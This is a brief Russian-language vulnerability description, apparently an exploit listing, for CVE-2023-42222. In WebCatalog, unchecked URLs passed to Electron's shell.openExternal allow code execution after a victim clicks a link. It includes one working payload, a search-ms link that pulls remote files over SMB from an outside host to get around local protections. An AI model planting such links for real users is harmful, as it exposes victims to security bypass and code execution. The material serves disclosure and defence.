
Эксплойт-доказательство концепции для CVE-2023-42222 в WebCatalog, демонстрирующий выполнение произвольных URL через shell.openExternal в Electron для обхода защитных механизмов и выполнения кода.
Версии WebCatalog до 48.4.0 вызывают функцию Electron shell.openExternal без проверки того, что URL является ресурсом http или https, при некоторых обстоятельствах. Эта уязвимость позволяет злоумышленнику выполнить код на машине жертвы, отправляя сообщения, содержащие ссылки с произвольными протоколами. Жертва должна взаимодействовать со ссылкой и видит URL, который открывается.


Уязвимость можно подтвердить, синхронизируя страницу, которая допускает произвольные URL. Если синхронизирован веб-сайт, содержащий search-ms://query=PsExec.exe&crumb=location://live.sysinternals.com/tools, то создаётся внешнее SMB-подключение. Затем это можно использовать для обхода защитных механизмов на локальной машине и показа пользователю вредоносных файлов, которые обычно были бы заблокированы.